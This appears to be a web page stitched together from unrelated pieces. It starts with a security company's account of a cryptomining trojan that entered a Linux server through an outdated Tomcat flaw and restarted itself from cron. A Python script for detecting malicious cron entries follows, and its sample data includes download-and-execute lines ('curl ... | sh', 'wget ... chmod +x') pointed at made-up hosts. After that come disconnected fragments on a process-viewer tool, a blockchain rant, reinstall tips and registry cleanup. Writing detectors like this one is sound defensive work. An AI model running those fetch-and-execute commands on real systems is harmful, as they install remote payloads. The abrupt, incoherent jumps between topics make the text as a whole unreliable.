Downloaded mining program
A new customer recently consulted the Sine security company, saying that his website often lags and fails to open, and that the remote connection to the server is extremely slow. Sometimes the ping value reaches 300-500, and he often switches. After listening to the customer, one would generally judge that he had been attacked by mixed CC + DDoS traffic. Strangely, there was no traffic attack on the computer room. It was not a traffic attack, yet it still caused the server to lag and the website to fail to open. What kind of attack is this? To solve the customer's server lag, we immediately arranged for a security engineer to carry out security detection and deployment on his Linux server.
The mining Trojan horse is also designed so that if the customer forcibly stops the mining process, it automatically starts again and continues mining, achieving uninterrupted mining.
Careful inspection shows that it does this by setting an hourly scheduled task that remotely downloads the shell mining Trojan horse and executes it. The task checks whether the mining process currently exists and, if not, starts the Trojan horse to mine.
A detailed security inspection was carried out on the client's Linux server. Fortunately, it found no encrypted server data and no worm virus infection. If the data had been encrypted, the loss would have been great: the client was a platform, and the client's data was very important. After the mining Trojan horse was found, the customer needed to know how the server had been attacked and how the Trojan horse had been uploaded, so that such attacks could be prevented later.
Through security detection and analysis, our security engineers found that the server uses an Apache Tomcat environment, the open architecture of the platform is JSP + Oracle database, and Apache Tomcat is a 2016 version, which leads to the serious remote command execution vulnerability of Apache. Through this vulnerability, the intruder can directly invade the server and get administrator permission on the server.
The Sine security engineer immediately repaired the Apache vulnerability and cleared the Trojan horse. With that, the problem was solved: the client's server runs stably, and the website opens normally.
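The persistence described above, an hourly scheduled task that downloads a shell script and runs it, leaves a recognisable entry in the crontab. The following is an added example, not code from the original page: the function names, the sample entries and the `example.invalid` hosts are constructed, and the two patterns are a starting heuristic rather than a complete detector.

```python
import re

# A fetch of remote content with curl or wget ...
FETCH = re.compile(r"\b(?:curl|wget)\b.*?https?://\S+", re.I)
# ... whose output is piped to a shell, or saved and then made executable or run.
EXEC = re.compile(r"\|\s*(?:ba|da)?sh\b|(?:;|&&)\s*(?:(?:ba|da)?sh\s|chmod\s+\+x|\./)")
MACROS = {"@hourly": "0 * * * *", "@daily": "0 0 * * *"}

def parse_entry(line, system_format=False):
    """Return (schedule, command) or None; system_format=True has a user field."""
    line = line.strip()
    if not line or line.startswith("#") or re.match(r"[A-Za-z_]\w*\s*=", line):
        return None  # comment, blank line or VAR=value setting
    parts = line.split()
    if parts[0].startswith("@"):
        sched, rest = MACROS.get(parts[0], parts[0]), parts[1:]
    elif len(parts) >= 6:
        sched, rest = " ".join(parts[:5]), parts[5:]
    else:
        return None
    return sched, " ".join(rest[1:] if system_format else rest)

def at_least_hourly(sched):
    fields = sched.split()  # an unrestricted hour field fires every hour
    return len(fields) == 5 and fields[1] in ("*", "*/1")

def find_download_exec(crontab_text, system_format=False):
    """List cron entries that download remote content and then execute it."""
    findings = []
    for n, line in enumerate(crontab_text.splitlines(), 1):
        entry = parse_entry(line, system_format)
        fetch = FETCH.search(entry[1]) if entry else None
        if fetch and EXEC.search(entry[1], fetch.start()):
            findings.append({"line": n, "schedule": entry[0], "command": entry[1],
                             "hourly": at_least_hourly(entry[0])})
    return findings

SAMPLE = """\
# constructed sample crontab; hosts and paths are made up for this example
MAILTO=root
30 2 * * * /usr/local/bin/backup.sh
0 * * * * curl -fsSL http://dl.example.invalid/x.sh | sh
@hourly wget -q http://dl.example.invalid/m -O /tmp/.m && chmod +x /tmp/.m && /tmp/.m
15 4 * * 0 curl -s https://repo.example.invalid/status > /var/tmp/status.txt
"""

if __name__ == "__main__":
    for f in find_download_exec(SAMPLE):
        print(f["line"], "hourly" if f["hourly"] else "other", f["command"])
```

Feed it the output of `crontab -l` for each account, and the contents of `/etc/crontab` and `/etc/cron.d/*` with `system_format=True`.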
if the process
Magic Rabbit is more practical.
You can see all the processes in the process option of Magic Rabbit.
System processes are green and marked as system processes, other processes are black, and the location of each process's file on your computer is displayed. Right-click a process and there is an option to check the process information online. Open it and there are very clear labels, such as: whether it is a Trojan horse, whether it is an error, whether it is a background process, whether it occupies memory, whether it is spyware, and a series of other notes.
Use antivirus. If it can't kill it, you can check for the program with high CPU or GPU usage and delete it manually. If that doesn't work, change the hard disk (the disk where the mining program is located)... or change the computer.
Please find out what blockchain is and how it is applied in the supply chain scenario, and then you will find out what you said. Although I will popularize science for you, I will show it to other readers. You don't even understand what blockchain is and what the essence of blockchain is, so you ask this kind of question. The layman seems to be very professional; experts are laughing at you.
Therefore, the application scenarios with blockchain technology as the underlying technology only verify the accuracy of the data itself, but cannot verify the authenticity of the associated objects. As you said, if the data input is wrong, the data saved by the blockchain is also wrong, but it cannot be changed again, which is also a disadvantage of blockchain technology. However, this does not mean that there is no application scenario for blockchain technology. It is still very useful, but it will not be mentioned here.
- Back up the host data, and then reinstall the system
- Do not use the old version of the system. It is recommended that after reinstalling the system in 2012 or 2016
- Delete other accounts except the administrator, and then install 360 security guard to patch
- Install the server security software
When you downloaded this software, did you install it first? Or, when you clicked it for the first time, was there a prompt to write the registration information to the computer? If not, you can delete it. You don't need to uninstall.
If it is installed, you can find it in the installation location or in the control panel. If you didn't install it and it just wrote some registration information when you clicked, then at most you can delete the registration information about the software in the registry after deleting the software from the hard disk. Even if you don't delete the registration information, it won't have any impact.